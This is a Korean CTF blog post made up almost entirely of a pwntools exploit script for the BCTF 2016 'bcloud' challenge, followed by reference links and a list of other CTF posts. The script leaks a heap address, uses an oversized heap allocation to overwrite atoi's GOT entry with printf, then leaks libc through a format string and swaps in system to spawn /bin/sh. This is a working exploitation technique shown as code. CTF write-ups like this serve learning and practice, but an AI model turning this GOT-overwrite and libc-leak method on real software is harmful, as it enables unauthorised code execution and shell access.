w00t@ubuntu32svr:~/bctf/bcloud$ cat a.py
#!/usr/bin/env python from pwn import * addr_plt_printf = 0x080484d0 addr_got_atoi = 0x0804b03c offset_libc_IO_stderr = 0x001aa960 offset_libc_system = 0x00040190 def New(cmn, size, data): cmn.recvuntil('>>\n') cmn.sendline('1') cmn.recvuntil('content:\n') cmn.sendline(str(size)) cmn.recvuntil('content:\n') if size>0: cmn.sendline(data) def Edit(cmn, id_num, data): cmn.recvuntil('>>\n') cmn.sendline('3 ') cmn.recvuntil('id:\n') cmn.sendline(str(id_num)) cmn.recvuntil('content:\n') cmn.sendline(data) s = process('./bcloud.9a3bd1d30276b501a51ac8931b3e43c4') s.recvuntil('name:\n') s.send('a'*0x40) buf = s.recv(0x44) print hexdump(buf) buf = s.recvuntil('! ') print hexdump(buf) addr_heap = buf[:-2] addr_heap = u32(addr_heap)-8 print('addr_heap : 0x%08x' % addr_heap) buf=s.recvuntil('Org:\n') print hexdump(buf) s.send('a'*0x40) buf=s.recvuntil('Host:\n') print hexdump(buf) s.sendline(p32(0xffffffff)) New(s, addr_got_atoi-0x4-(addr_heap+0xe0)-0x8, None)
exploit_st1 = p32(0xdeadbeef) exploit_st1 += p32(addr_plt_printf) New(s, 0x100, exploit_st1) s.recvuntil('>>\n') s.sendline('%24$p') addr_libc_IO_stderr = int(s.recv(10),16) addr_libc_base = addr_libc_IO_stderr - offset_libc_IO_stderr addr_libc_system = addr_libc_base + offset_libc_system print('addr_libc_base : 0x%08x' % addr_libc_base) exploit_st2 = p32(0xdeadbeef) exploit_st2 += p32(addr_libc_system)
Edit(s, 0, exploit_st2)
s.recvuntil('>>\n') s.sendline('/bin/sh') s.interactive() |
### 참조
http://shift-crops.hatenablog.com/entry/2016/03/21/171249
http://www.hackerschool.org/HS_Boards/data/Lib_system/dfb_leon.txt (double free 원재아빠)
'CTF' 카테고리의 다른 글
| [tum ctf 2016] haggis - crpyto (0) | 2016.10.03 |
|---|---|
| [SCTF 2016] pwn2 한땀 한땀 ROP read /bin/sh (0) | 2016.09.16 |
| [tokyo 2016] ReverseBox (0) | 2016.09.12 |
| [tokyo ctf 2016]greeting (0) | 2016.09.06 |
| [plaidCTF]butterfly (0) | 2016.04.19 |
